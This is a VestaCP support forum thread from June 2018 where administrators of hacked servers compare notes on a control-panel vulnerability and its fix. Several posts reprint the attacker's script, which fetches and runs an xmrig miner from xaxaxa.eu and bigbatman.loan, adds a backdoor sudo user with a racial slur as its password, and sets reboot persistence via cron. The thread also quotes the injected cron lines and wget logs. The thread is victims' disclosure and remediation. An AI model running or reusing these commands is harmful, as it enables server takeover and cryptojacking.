We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
have been HACKED ! by xaxaxa.eu
Re: have been HACKED ! by xaxaxa.eu
please open another thread for this issue.aximus wrote: ↑Tue Jun 26, 2018 8:11 amI did exactly as you wrote.ScIT wrote: ↑Tue Jun 26, 2018 7:29 am
did you tried to upgrade like i wrote? -> viewtopic.php?f=10&t=17183#p71558
If yes, please share the output of ./v-list-sys-vesta-updates.
I don't mean to hijack the topic. But if I'm not receiving updates then of course my server will be targeted.Code: Select all
PKG VER REL ARCH UPDT DATE --- --- --- ---- ---- ---- vesta 0.9.8 20 amd64 no 2018-04-09 vesta-php 0.9.8 19 amd64 no 2018-01-23 vesta-nginx 0.9.8 20 amd64 no 2018-04-09
Re: have been HACKED ! by xaxaxa.eu
Because I still have not get any informations from other users: Was your system infected with installed patch or without? Actual patch is 0.9.8-22 and fixes the security issue.jonny1960 wrote: ↑Tue Jun 26, 2018 8:07 amalso was hacked tonight by mining virus
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Re: have been HACKED ! by xaxaxa.eu
As a last reply; I have fixed the issue by adding the right repositories to apt:
Code: Select all
CHOST='c.vestacp.com'
RHOST='apt.vestacp.com'
codename="$(lsb_release -s -c)"
apt=/etc/apt/sources.list.d
echo "deb http://$RHOST/$codename/ $codename vesta" > $apt/vesta.list
wget $CHOST/deb_signing.key -O deb_signing.key
apt-key add deb_signing.key
echo "deb http://nginx.org/packages/mainline/ubuntu/ $codename nginx" > $apt/nginx.list
wget http://nginx.org/keys/nginx_signing.key -O /tmp/nginx_signing.key
apt-key add /tmp/nginx_signing.key
apt-get update && apt-get upgrade -y
Re: have been HACKED ! by xaxaxa.eu
Glad that you found the solution by your own!aximus wrote: ↑Tue Jun 26, 2018 9:20 amAs a last reply; I have fixed the issue by adding the right repositories to apt:
This is normally done when installing Vesta, but somehow it got lost for my installation.Code: Select all
CHOST='c.vestacp.com' RHOST='apt.vestacp.com' codename="$(lsb_release -s -c)" apt=/etc/apt/sources.list.d echo "deb http://$RHOST/$codename/ $codename vesta" > $apt/vesta.list wget $CHOST/deb_signing.key -O deb_signing.key apt-key add deb_signing.key echo "deb http://nginx.org/packages/mainline/ubuntu/ $codename nginx" > $apt/nginx.list wget http://nginx.org/keys/nginx_signing.key -O /tmp/nginx_signing.key apt-key add /tmp/nginx_signing.key apt-get update && apt-get upgrade -y
Re: have been HACKED ! by xaxaxa.eu
hacking happened on version 21, after update to 22 and remove of the virus the issue has stopped.
but now i have problem with file_get_contents() it does not work and does not send a request. zero response comes to fast. but curl_init() works.
Do you have an idea of what the problem may be?
file_get_contents(): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error
Re: have been HACKED ! by xaxaxa.eu
in Vesta CRON!!!!
wget -O /tmp/load.sh http://bigbatman.loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >>
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod x /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
u must delete and Update.
wget -O /tmp/load.sh http://bigbatman.loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >>
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod x /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
u must delete and Update.
Re: have been HACKED ! by xaxaxa.eu
Please open a own topic for this issue.jonny1960 wrote: ↑Tue Jun 26, 2018 9:23 amhacking happened on version 21, after update to 22 and remove of the virus the issue has stopped.
but now i have problem with file_get_contents() it does not work and does not send a request. zero response comes to fast. but curl_init() works.
Do you have an idea of what the problem may be?
file_get_contents(): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error
Re: have been HACKED ! by xaxaxa.eu
I don't think that this alone will solve the issue. As already written, the update does NOT remove malware, it fixes the security issue. In my point of view: Never trust a hacked server, you don't know what happened exactly and what the hacker (or script) have done with it. Best and save way would be to reinstall the server and migrate the user content.Llorca wrote: ↑Tue Jun 26, 2018 10:36 amin Vesta CRON!!!!
wget -O /tmp/load.sh http://bigbatman.loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >>
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod x /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
u must delete and Update.
Re: have been HACKED ! by xaxaxa.eu
Hi,
tonight haker fuck me.
Ok, I restored 2 day ago snapshoot and update last vesta
I closed port 8083 my firewall, I think is bad use default public vesta port, but change port don't solve vestacp bug, hacker use login page.
Before update I used 0.9.8 20
Vestacp send me e-mail:
tonight haker fuck me.
Code: Select all
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa.eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Code: Select all
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-26
vesta-php 0.9.8 21 amd64 yes 2018-05-22
vesta-nginx 0.9.8 21 amd64 yes 2018-05-22
Before update I used 0.9.8 20
Vestacp send me e-mail:
Code: Select all
--2018-06-26 01:34:01-- http://xaxaxa.eu/load.sh Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: ‘/tmp/load.sh’
0K 100% 116M=0s
2018-06-26 01:34:02 (116 MB/s) - ‘/tmp/load.sh’ saved [605/605]
chmod: invalid mode: ‘x’
Try 'chmod --help' for more information.
--2018-06-26 01:34:02-- http://xaxaxa.eu/gcc Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1256576 (1.2M) [text/plain]
Saving to: ‘/tmp/gcc’
0K .......... .......... .......... .......... .......... 4% 168K 7s
50K .......... .......... .......... .......... .......... 8% 187K 6s
100K .......... .......... .......... .......... .......... 12% 269K 5s
150K .......... .......... .......... .......... .......... 16% 323K 5s
200K .......... .......... .......... .......... .......... 20% 320K 4s
250K .......... .......... .......... .......... .......... 24% 221K 4s
300K .......... .......... .......... .......... .......... 28% 80.1K 5s
350K .......... .......... .......... .......... .......... 32% 144K 5s
400K .......... .......... .......... .......... .......... 36% 210K 4s
450K .......... .......... .......... .......... .......... 40% 281K 4s
500K .......... .......... .......... .......... .......... 44% 286K 4s
550K .......... .......... .......... .......... .......... 48% 325K 3s
600K .......... .......... .......... .......... .......... 52% 436K 3s
650K .......... .......... .......... .......... .......... 57% 389K 2s
700K .......... .......... .......... .......... .......... 61% 446K 2s
750K .......... .......... .......... .......... .......... 65% 431K 2s
800K .......... .......... .......... .......... .......... 69% 470K 2s
850K .......... .......... .......... .......... .......... 73% 426K 1s
900K .......... .......... .......... .......... .......... 77% 399K 1s
950K .......... .......... .......... .......... .......... 81% 407K 1s
1000K .......... .......... .......... .......... .......... 85% 409K 1s
1050K .......... .......... .......... .......... .......... 89% 164K 1s
1100K .......... .......... .......... .......... .......... 93% 79.7M 0s
1150K .......... .......... .......... .......... .......... 97% 861K 0s
1200K .......... .......... ....... 100% 348K=4.5s
2018-06-26 01:34:07 (272 KB/s) - ‘/tmp/gcc’ saved [1256576/1256576]
chmod: cannot access ‘gcc’: No such file or directory
--2018-06-26 01:34:07-- http://xaxaxa.eu/config_1.json Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 681 [application/json]
Saving to: ‘/tmp/config_1.json’
0K 100% 49.5M=0s
2018-06-26 01:34:07 (49.5 MB/s) - ‘/tmp/config_1.json’ saved [681/681]
[sudo] password for admin: useradd: user 'sysroot' already exists
/tmp/load.sh: line 13: /tmp/gcc: Permission denied
/tmp/load.sh: line 15: /usr/local/vesta/bin/v-update-sys-vesta-all: Permission denied
Code: Select all
--2018-06-26 01:34:01-- http://xaxaxa.eu/load.sh Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: ‘/tmp/load.sh’
0K 100% 48.2M=0s
2018-06-26 01:34:02 (48.2 MB/s) - ‘/tmp/load.sh’ saved [605/605]
/bin/sh: /tmp/load.sh: Text file busy
Re: have been HACKED ! by xaxaxa.eu
I have post a kick and dirty tutorial to remove which I have found : viewtopic.php?p=71564#p71564
In my case, and the time to move the hosted websites on a new server, it's solve the issue.
In my case, and the time to move the hosted websites on a new server, it's solve the issue.